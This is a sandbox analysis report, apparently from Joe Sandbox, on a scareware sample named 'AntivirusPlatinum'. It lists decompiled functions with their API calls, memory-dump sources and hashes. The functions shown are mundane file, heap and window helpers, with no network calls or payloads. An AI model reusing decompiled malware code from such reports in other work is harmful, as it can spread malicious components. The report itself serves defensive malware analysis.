                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,004054A9,?,?,?,004032B2,?,00414C7C,0040339B,00000002,?,0040501E,?), ref: 00404F4F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                                                  • String ID: |LA
                                                                                                                                                  • API String ID: 2591292051-4290591017
                                                                                                                                                  • Opcode ID: 6f0d0f8878a62e980662d6e6074bd5ba14a99120c2933f954b287655d349c058
                                                                                                                                                  • Instruction ID: fb12770f161869685dacc0fb60d23730991de6ff872b0f0e221dcc50feffd473
                                                                                                                                                  • Opcode Fuzzy Hash: 6f0d0f8878a62e980662d6e6074bd5ba14a99120c2933f954b287655d349c058
                                                                                                                                                  • Instruction Fuzzy Hash: 6701D4F01517118FE3309A34A5587A37798A796322F104B3FD6E2D36D0D37CA8868B49
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004051D8(void* __ecx, CHAR* _a4, WCHAR* _a8, struct _SECURITY_ATTRIBUTES* _a12) {
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				WCHAR* _t36;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  
                                                                                                                                                  				_t34 = __ecx;
                                                                                                                                                  				_t37 = __ecx;
                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                  					L2:
                                                                                                                                                  					_a12 = 1;
                                                                                                                                                  				} else {
                                                                                                                                                  					_a12 = 0;
                                                                                                                                                  					if( *((intOrPtr*)(__ecx + 0x16)) != 0) {
                                                                                                                                                  						goto L2;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t22 = E00406EA5();
                                                                                                                                                  				_t36 = _a8;
                                                                                                                                                  				if(_t22 == 0 || _t36 == 0 ||  *_t36 == 0) {
                                                                                                                                                  					_t23 = CreateFileA(_a4, 0xc0000000, _a12, 0, 2, 0, 0); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t23 = CreateFileW(_t36, 0xc0000000, _a12, 0, 2, 0, 0);
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t37 + 4) = _t23;
                                                                                                                                                  				 *((char*)(_t37 + 0x12)) = 1;
                                                                                                                                                  				 *((intOrPtr*)(_t37 + 0xc)) = 0;
                                                                                                                                                  				 *((char*)(_t37 + 0x10)) = 0;
                                                                                                                                                  				if(_t36 == 0) {
                                                                                                                                                  					 *((short*)(_t37 + 0x418)) = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					E0040E338(_t37 + 0x418, _t36);
                                                                                                                                                  				}
                                                                                                                                                  				_t25 = _t37 + 0x17;
                                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                                  					E0040E115(_t34, _t36, _t25, 0x1000000);
                                                                                                                                                  				} else {
                                                                                                                                                  					E0040A477(_t25, _a4);
                                                                                                                                                  				}
                                                                                                                                                  				E00404F07(_t37,  *(_t37 + 4));
                                                                                                                                                  				return 0 |  *(_t37 + 4) != 0xffffffff;
                                                                                                                                                  			}








                                                                                                                                                  0x004051d8
                                                                                                                                                  0x004051e0
                                                                                                                                                  0x004051e5
                                                                                                                                                  0x004051ef
                                                                                                                                                  0x004051ef
                                                                                                                                                  0x004051e7
                                                                                                                                                  0x004051e7
                                                                                                                                                  0x004051ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004051ed
                                                                                                                                                  0x004051f6
                                                                                                                                                  0x004051fb
                                                                                                                                                  0x00405200
                                                                                                                                                  0x00405231
                                                                                                                                                  0x0040520b
                                                                                                                                                  0x00405219
                                                                                                                                                  0x00405219
                                                                                                                                                  0x00405237
                                                                                                                                                  0x0040523a
                                                                                                                                                  0x0040523e
                                                                                                                                                  0x00405241
                                                                                                                                                  0x00405246
                                                                                                                                                  0x00405259
                                                                                                                                                  0x00405248
                                                                                                                                                  0x00405250
                                                                                                                                                  0x00405250
                                                                                                                                                  0x00405260
                                                                                                                                                  0x00405266
                                                                                                                                                  0x0040527a
                                                                                                                                                  0x00405268
                                                                                                                                                  0x0040526c
                                                                                                                                                  0x0040526c
                                                                                                                                                  0x00405284
                                                                                                                                                  0x00405296

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404EB3,00000045,?,00000001,00000045), ref: 00405219
                                                                                                                                                  • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000000,00000000,?,00000045,00000001,?,00404EB3,00000045,?,00000001,00000045), ref: 00405231
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: ec04e94c21e6327de585a74cc546da97f01177137bb2f8558239996e927b6dc1
                                                                                                                                                  • Instruction ID: db8e20e7d0df6165b05d6c65c26f56ad29c5289aa69bd9df7c45a2987c6c6b35
                                                                                                                                                  • Opcode Fuzzy Hash: ec04e94c21e6327de585a74cc546da97f01177137bb2f8558239996e927b6dc1
                                                                                                                                                  • Instruction Fuzzy Hash: BF21CF71000748BFEB209F60CC85FAB7BA8EF40744F04897EF551A6281C7789D649F69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405767(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                  				long _t6;
                                                                                                                                                  				WCHAR* _t8;
                                                                                                                                                  
                                                                                                                                                  				if(E00406EA5() == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					_t6 = GetFileAttributesA(_a4); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t8 = _a8;
                                                                                                                                                  					if(_t8 == 0 ||  *_t8 == 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t6 = GetFileAttributesW(_t8);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return 0 | _t6 != 0xffffffff;
                                                                                                                                                  			}





                                                                                                                                                  0x0040576e
                                                                                                                                                  0x00405787
                                                                                                                                                  0x0040578b
                                                                                                                                                  0x00405770
                                                                                                                                                  0x00405770
                                                                                                                                                  0x00405776
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040577e
                                                                                                                                                  0x0040577f
                                                                                                                                                  0x0040577f
                                                                                                                                                  0x00405776
                                                                                                                                                  0x0040579b

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?,00404D18,00000045,?,?,?,?), ref: 0040577F
                                                                                                                                                  • GetFileAttributesA.KERNELBASE(?,00404D18,00000045,?,?,?,?), ref: 0040578B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$Version
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3849939888-0
                                                                                                                                                  • Opcode ID: 524b25f258809a36dfc35c36927b002a5b6a96657706656b02a112759786d9b7
                                                                                                                                                  • Instruction ID: 7e3c92b8c8380a4f5cb43efcc2c9e82e3b9f6ddc0792d840e2a2494f752396e4
                                                                                                                                                  • Opcode Fuzzy Hash: 524b25f258809a36dfc35c36927b002a5b6a96657706656b02a112759786d9b7
                                                                                                                                                  • Instruction Fuzzy Hash: 81D01234100601DBDB185B35CE8456F77A5EB01350F25853AA893E71E0D779CCA0FE29
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004057E8(void* __eflags, CHAR* _a4, WCHAR* _a8, long _a12) {
                                                                                                                                                  				signed int _t8;
                                                                                                                                                  				WCHAR* _t10;
                                                                                                                                                  
                                                                                                                                                  				if(E00406EA5() == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					_t8 = SetFileAttributesA(_a4, _a12); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t10 = _a8;
                                                                                                                                                  					if(_t10 == 0 ||  *_t10 == 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t8 = SetFileAttributesW(_t10, _a12);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t8 & 0xffffff00 | _t8 != 0x00000000;
                                                                                                                                                  			}





                                                                                                                                                  0x004057ef
                                                                                                                                                  0x0040580c
                                                                                                                                                  0x00405814
                                                                                                                                                  0x004057f1
                                                                                                                                                  0x004057f1
                                                                                                                                                  0x004057f7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004057ff
                                                                                                                                                  0x00405804
                                                                                                                                                  0x00405804
                                                                                                                                                  0x004057f7
                                                                                                                                                  0x0040581f

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000400,004058DE,00000000,00000400,00000000,?,004059B4,00000400,00000002,00000001,00000000), ref: 00405804
                                                                                                                                                  • SetFileAttributesA.KERNELBASE(00000000,00000400,004058DE,00000000,00000400,00000000,?,004059B4,00000400,00000002,00000001,00000000), ref: 00405814
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile$Version
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3849939888-0
                                                                                                                                                  • Opcode ID: 12ca7f4e58392410de16856001fcee0e91b4b1d1f28ffb7e50594ca5539bfda5
                                                                                                                                                  • Instruction ID: 08685831cb82508d6e727d5ab8162a25905bf89111ec148f976887a7ede13977
                                                                                                                                                  • Opcode Fuzzy Hash: 12ca7f4e58392410de16856001fcee0e91b4b1d1f28ffb7e50594ca5539bfda5
                                                                                                                                                  • Instruction Fuzzy Hash: 1EE0EC36204601EADB556F21DE04A1FBBAAEF80350F04C43AB985E51F0D778CC70DB29
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405866(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                  				signed int _t6;
                                                                                                                                                  				WCHAR* _t8;
                                                                                                                                                  
                                                                                                                                                  				if(E00406EA5() == 0) {
                                                                                                                                                  					L4:
                                                                                                                                                  					_t6 = DeleteFileA(_a4); // executed
                                                                                                                                                  				} else {
                                                                                                                                                  					_t8 = _a8;
                                                                                                                                                  					if(_t8 == 0 ||  *_t8 == 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t6 = DeleteFileW(_t8);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t6 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                  			}





                                                                                                                                                  0x0040586d
                                                                                                                                                  0x00405886
                                                                                                                                                  0x0040588a
                                                                                                                                                  0x0040586f
                                                                                                                                                  0x0040586f
                                                                                                                                                  0x00405875
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040587d
                                                                                                                                                  0x0040587e
                                                                                                                                                  0x0040587e
                                                                                                                                                  0x00405875
                                                                                                                                                  0x00405895

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                  • DeleteFileW.KERNEL32(?,00404FDA,-00000017,00000418,00000000,004054A2,?,?,?,004032B2,?,00414C7C,0040339B,00000002,?,0040501E), ref: 0040587E
                                                                                                                                                  • DeleteFileA.KERNELBASE(00000000,00404FDA,-00000017,00000418,00000000,004054A2,?,?,?,004032B2,?,00414C7C,0040339B,00000002,?,0040501E), ref: 0040588A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeleteFile$Version
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3886669992-0
                                                                                                                                                  • Opcode ID: cf6deccc3a9250c3054f7bca4c62ca8db216f1a25379af536149a02a497da06f
                                                                                                                                                  • Instruction ID: 716b7f0cb8a833341a7e27b2f494167b72d8bdc84a5c6d0c38cb64946278def0
                                                                                                                                                  • Opcode Fuzzy Hash: cf6deccc3a9250c3054f7bca4c62ca8db216f1a25379af536149a02a497da06f
                                                                                                                                                  • Instruction Fuzzy Hash: 8FD012315046019AD7147B22CE48A2B37A4EB50380B08C0366C05E11E0E778C870DA19
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040A205(void* _a4) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				char _t5;
                                                                                                                                                  
                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                  					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                  					return _t5;
                                                                                                                                                  				}
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}





                                                                                                                                                  0x0040a20c
                                                                                                                                                  0x0040a21a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040a21a
                                                                                                                                                  0x0040a221

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A213
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A21A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$FreeProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3859560861-0
                                                                                                                                                  • Opcode ID: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                  • Instruction ID: ddbe3d2fe61905f89b57794dcc6228a96356cb271f48638cc85bb0a9df389cd0
                                                                                                                                                  • Opcode Fuzzy Hash: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                  • Instruction Fuzzy Hash: 62C01236004208ABCB101B90EA0CBDA3E69EB08302F008031B708841A0C6B596B0CBAE
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040307F(struct HWND__* _a4, int _a8, signed char _a12) {
                                                                                                                                                  				int _t6;
                                                                                                                                                  
                                                                                                                                                  				_t6 = EnableWindow(GetDlgItem(_a4, _a8), _a12 & 0x000000ff); // executed
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}




                                                                                                                                                  0x00403094
                                                                                                                                                  0x0040309a

                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040308D
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00403094
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallbackDispatcherItemUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4250310104-0
                                                                                                                                                  • Opcode ID: 53d7fe0b17c9d7c83ce2a09200998b9300a9737409a95869f191deb72e36b247
                                                                                                                                                  • Instruction ID: a5b1e21e8c70e636ad4e3161602f3880b2a1687c4984bed245f76023c7c7062a
                                                                                                                                                  • Opcode Fuzzy Hash: 53d7fe0b17c9d7c83ce2a09200998b9300a9737409a95869f191deb72e36b247
                                                                                                                                                  • Instruction Fuzzy Hash: D1C04C76408241BFCB015BA09E08DAFBFA9EBD4311F00C959B1A5C0030C7B58461DB16
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                  			E0040B613(void* __edi, void* __esi, intOrPtr* _a4, CHAR* _a8, char* _a12, char* _a16, char* _a20) {
                                                                                                                                                  				char _v4100;
                                                                                                                                                  				char* _t29;
                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                  				char _t32;
                                                                                                                                                  				char* _t34;
                                                                                                                                                  				char* _t45;
                                                                                                                                                  				char* _t47;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				void* _t50;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				CHAR* _t52;
                                                                                                                                                  
                                                                                                                                                  				_t51 = __esi;
                                                                                                                                                  				_t50 = __edi;
                                                                                                                                                  				E00401200(0x1000);
                                                                                                                                                  				_t29 = _a16;
                                                                                                                                                  				_t47 = _a20;
                                                                                                                                                  				if(_t29 != 0) {
                                                                                                                                                  					 *_t29 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t47 != 0) {
                                                                                                                                                  					 *_t47 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t30 = _a4;
                                                                                                                                                  				if(_t30 == 0) {
                                                                                                                                                  					L24:
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t32 =  *_t30;
                                                                                                                                                  					if(_t32 == 0) {
                                                                                                                                                  						goto L24;
                                                                                                                                                  					}
                                                                                                                                                  					_push(_t51);
                                                                                                                                                  					_t52 = 0;
                                                                                                                                                  					_t48 = 0;
                                                                                                                                                  					do {
                                                                                                                                                  						_a4 = _a4 + 1;
                                                                                                                                                  						if(_t32 != 0x3d) {
                                                                                                                                                  							if(_t32 == 0xd) {
                                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                                  								L20:
                                                                                                                                                  								 *_a8 = 0;
                                                                                                                                                  								_t34 = _a12;
                                                                                                                                                  								if(_t34 != 0) {
                                                                                                                                                  									 *_t34 = 0;
                                                                                                                                                  									if(_t52 != 0) {
                                                                                                                                                  										ExpandEnvironmentStringsA(_t52,  &_v4100, 0x1000);
                                                                                                                                                  										_t20 = _t50 - 1; // 0xfff
                                                                                                                                                  										E0040A4AB(_a12,  &_v4100, _t20);
                                                                                                                                                  										 *((char*)(_a12 + _t50 - 1)) = 0;
                                                                                                                                                  										 *_t52 = 0;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								return _a4;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t32 == 0xa) {
                                                                                                                                                  								goto L20;
                                                                                                                                                  							}
                                                                                                                                                  							L15:
                                                                                                                                                  							_a8 =  &(_a8[1]);
                                                                                                                                                  							 *_a8 = _t32;
                                                                                                                                                  							_t12 = _t50 - 2; // 0xffe
                                                                                                                                                  							if(_t48 > _t12) {
                                                                                                                                                  								 *_a20 = 1;
                                                                                                                                                  								goto L20;
                                                                                                                                                  							}
                                                                                                                                                  							goto L16;
                                                                                                                                                  						}
                                                                                                                                                  						if(_a12 == 0 || _t52 != 0) {
                                                                                                                                                  							goto L15;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t45 = _a16;
                                                                                                                                                  							if(_t45 != 0) {
                                                                                                                                                  								 *_t45 = 1;
                                                                                                                                                  							}
                                                                                                                                                  							_t52 = _a8;
                                                                                                                                                  						}
                                                                                                                                                  						L16:
                                                                                                                                                  						_t32 =  *_a4;
                                                                                                                                                  						_t48 = _t48 + 1;
                                                                                                                                                  					} while (_t32 != 0);
                                                                                                                                                  					goto L20;
                                                                                                                                                  				}
                                                                                                                                                  			}














                                                                                                                                                  0x0040b613
                                                                                                                                                  0x0040b613
                                                                                                                                                  0x0040b61b
                                                                                                                                                  0x0040b620
                                                                                                                                                  0x0040b623
                                                                                                                                                  0x0040b62b
                                                                                                                                                  0x0040b62d
                                                                                                                                                  0x0040b62d
                                                                                                                                                  0x0040b631
                                                                                                                                                  0x0040b633
                                                                                                                                                  0x0040b633
                                                                                                                                                  0x0040b635
                                                                                                                                                  0x0040b63a
                                                                                                                                                  0x0040b6e3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b640
                                                                                                                                                  0x0040b640
                                                                                                                                                  0x0040b644
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b64a
                                                                                                                                                  0x0040b64b
                                                                                                                                                  0x0040b64d
                                                                                                                                                  0x0040b64f
                                                                                                                                                  0x0040b64f
                                                                                                                                                  0x0040b654
                                                                                                                                                  0x0040b670
                                                                                                                                                  0x0040b699
                                                                                                                                                  0x0040b69c
                                                                                                                                                  0x0040b69f
                                                                                                                                                  0x0040b6a1
                                                                                                                                                  0x0040b6a6
                                                                                                                                                  0x0040b6a8
                                                                                                                                                  0x0040b6ac
                                                                                                                                                  0x0040b6bb
                                                                                                                                                  0x0040b6c1
                                                                                                                                                  0x0040b6cf
                                                                                                                                                  0x0040b6d7
                                                                                                                                                  0x0040b6db
                                                                                                                                                  0x0040b6db
                                                                                                                                                  0x0040b6ac
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b6e0
                                                                                                                                                  0x0040b674
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b676
                                                                                                                                                  0x0040b679
                                                                                                                                                  0x0040b67c
                                                                                                                                                  0x0040b67e
                                                                                                                                                  0x0040b683
                                                                                                                                                  0x0040b694
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b694
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b683
                                                                                                                                                  0x0040b659
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b65f
                                                                                                                                                  0x0040b65f
                                                                                                                                                  0x0040b664
                                                                                                                                                  0x0040b666
                                                                                                                                                  0x0040b666
                                                                                                                                                  0x0040b669
                                                                                                                                                  0x0040b669
                                                                                                                                                  0x0040b685
                                                                                                                                                  0x0040b688
                                                                                                                                                  0x0040b68a
                                                                                                                                                  0x0040b68b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b68f

                                                                                                                                                  APIs
                                                                                                                                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFD4,00000000,?,?,?,?,?,?,0040D24D,?), ref: 0040B6BB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 237503144-0
                                                                                                                                                  • Opcode ID: 5fae4e63873776018887329e3184201ecfcb9ea2296943329708b5b4d23760c0
